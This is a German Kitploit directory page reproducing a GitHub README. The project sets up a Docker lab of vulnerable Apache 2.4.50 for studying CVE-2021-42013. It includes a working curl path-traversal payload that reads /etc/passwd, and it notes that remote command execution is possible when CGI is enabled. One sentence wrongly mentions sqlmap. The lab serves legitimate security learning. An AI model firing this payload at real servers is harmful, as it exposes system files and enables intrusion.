Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2021-42013-httpd — CVE: 2021-42013 Getestet auf: 2.4.49 und 2.4.50 Beschreibung: Pfad-Traversal- oder Remotecodeausführungs-Schwachstellen in Apache 2.4.49 und 2.4.50 | Kitploit
Tools/GitHubGitHub/cybfar/cve-2021-42013-httpd
Container-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungLabs & Praxis
GitHubcybfar/cve-2021-42013-httpd

cve-2021-42013-httpd

CVE: 2021-42013 Getestet auf: 2.4.49 und 2.4.50 Beschreibung: Pfad-Traversal- oder Remotecodeausführungs-Schwachstellen in Apache 2.4.49 und 2.4.50

Repository anzeigen
113vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Dockerisierung einer Schwachstelle: cve-2021-42013

Dieses Projekt zielt darauf ab, eine bestimmte Schwachstelle mit Docker zu dockerisieren. Ziel ist es, eine isolierte Umgebung zu schaffen, in der die Schwachstelle sicher ausgenutzt und getestet werden kann.

Verwundbare Anwendung

Apache HTTP Server 2.4.50 – Remote Code Execution && Path Traversal

Installation

Um dieses Projekt auszuführen, müssen Sie auf Ihrem Rechner Folgendes installiert haben:

  • Docker
  • Python
  • Curl

Sobald die Voraussetzungen installiert sind, können Sie dieses Git-Repository auf Ihren Rechner klonen:

root@kitploit:~
  git clone https://github.com/cybfar/cve-2021-42013-httpd.git

  cd Ccve-2021-42013-httpd

Wechseln Sie anschließend in das Verzeichnis und führen Sie den folgenden Befehl aus, um die verwundbare Umgebung einzurichten:

root@kitploit:~
  docker build -t apache-httpd-vuln .
  docker run -p 8000:80 apache-httpd-vuln

Greifen Sie anschließend unter http://localhost:8000 auf die Anwendung zu. Wenn alles gut geht, sollte „It works“ angezeigt werden.

Ausnutzung der Schwachstelle

Die Ausführung des folgenden Payloads mit curl zeigt, dass das Ziel verwundbar ist. Das Skript generiert den entsprechenden sqlmap-Befehl, um die Schwachstelle auszunutzen.

root@kitploit:~
  curl -v --path-as-is localhost:8000/icons/.%%32e/.%%32e/.%%32e/.%%32e/etc/passwd

Dieser Payload kann ohne Zustimmung des Benutzers direkt auf Benutzerinformationen im System zugreifen.

Sobald wir die CGI- oder CGID-Module auf dem Server aktiviert haben, ermöglicht diese Schwachstelle einem Angreifer die Ausführung beliebiger Befehle.

Tool herunterladen